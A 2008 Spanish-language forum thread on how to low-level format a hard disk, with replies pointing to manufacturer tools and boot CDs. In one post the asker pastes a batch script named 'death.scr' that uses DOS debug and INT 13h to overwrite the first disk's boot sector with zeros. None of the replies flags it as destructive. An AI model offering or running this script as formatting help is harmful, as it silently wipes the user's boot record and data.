| Ver tema anterior :: Ver siguiente tema |
| Autor |
Mensaje |
darksoul Conociendo Foroz

|
Publicado: Dom Jun 22, 2008 3:08 am Título del mensaje: format.exe |
|
|
| hola que tal a todos,,,,,,,, mi duda que planteo es que quiero formatear una pc a bajo nivel.... y me dijeron que consiguiera el comando format.exe y lo quemara en un cd....que luego meta ese cd y corriera el cd y despues activara ese comando y que asi se puede formatear a bajo nivel.........quiero saber que opinan de eso o si hay una mejor forma de formatear a bajo nivel |
|
|
 |
shadoweps Forero

|
|
|
 |
ghoku Yo soy el foro

|
Publicado: Dom Jun 22, 2008 8:45 am Título del mensaje: |
|
|
que sistema operativo le quieres poner despues de formatear? por que desde el de del sistema operativo puedes formatear _________________ COMO DICE EL TIO CHUACHENEGUER !!!!VOLVERE!!! HASTA PRONTO AMIGOS
|
|
|
 |
Gailen Yo soy el foro

|
Publicado: Dom Jun 22, 2008 12:26 pm Título del mensaje: |
|
|
Formatear a bajo nivel desde format.exe creo que no es posible. Debes de bajarte una herramienta CONCRETA para el fabricante y el modelo del disco duro que tienes desde la web del fabricante. Y formatear desde ella, creo que en DOS _________________ Aprende como funciona tu tarjeta grafica AQUI
Ahora, con una HD4850 IceQ4 Turbo!
|
|
|
 |
upanichad Moderador

|
Publicado: Dom Jun 22, 2008 12:33 pm Título del mensaje: |
|
|
pilla por internet el hirens boot cd aqlli tienes la herramientas que necesitas. Yo personalmente uso el powermax aunque digan que es para maxtor aún me sirvió para todos los hd hasta la fecha. Dejate de format.exe y vete a lo fácil que es coger un cd live cd con herramientas para hacer formateos a bajo nivel desde cero y con dos clicks. _________________
Por el bien de la comunidad respeta y ayudanos a aplicar las NORMAS
http://www.foroz.org/foroz/topic7292.html |
|
|
 |
darksoul Conociendo Foroz

|
Publicado: Dom Jun 22, 2008 5:17 pm Título del mensaje: thanks |
|
|
me parece que la opcion de upanichad y la de Gailen son persuasivas, por lo del link del segundo comentARIO PUES NO LO HE CHECADO PERO GRACIAS DE CUALQUIER FORMA...A MI ME PASARON ESTA FORMA PARA FORMATEAR QUE CREO TIENES QUE INTRODUCIR EN EL SIMBOLO DEL SISTEMA.... NO SE DIGANME POR FAVOR QUE OPINAN:
@echo off
set a=echo
call:a >"death.scr"
debug < death.scr
Exit
:a
%a%A 100
%a%INT 13
echo.
%a%RAX
%a%0301
%a%RBX
%a%0200
%a%F 200 L 200 0
%a%RCX
%a%0001
%a%RDX
%a%0080
%a%P
%a%Q
goto:eof |
|
|
 |
DploiD Yo soy el foro

|
Publicado: Dom Jun 22, 2008 5:36 pm Título del mensaje: |
|
|
Te pregunto: para que querés formatear a bajo nivel?, porque si no es por algo específico, no te conviene hacerlo... Un formateo normal completo alcanza y sobra...
Hay herramientas genéricas para hacer formateos de este tipo, no las uses, usa la del fabricante.
Un saludo. _________________ Avisame del spam
O postealo acá
|
|
|
 |
ruedas User destacando

|
Publicado: Lun Jun 23, 2008 8:29 pm Título del mensaje: |
|
|
hola
Bueno cada fabricante tiene su herramienta para hacer un formateo de bajo nivel. Como bien te aconseja DploiD no uses una harramienta generica.
Hoy en día no se realiza esta practica como se hacia con los discos antiguos, ya que el proceso genera
de nuevo la estructura física lo menos que te puede ocurrir es que el disco pierda rendimiento, si tienes sectores defectuosos y haces un formateo de bajo nivel puede dejar el disco inservible es así de simple.
Otra cosa es llenar el HDD de ceros para su posterior formateo.
El comando Format.exe (no funciona en particiones ntfs solo en fat32) y en ningún caso te sirve para hacer un formateo de bajo nivel es mas, mucho mas eficaz es el formateo lento hecho con el cd de instalación del xp.
Salu2 |
|
|
 |
|
|
|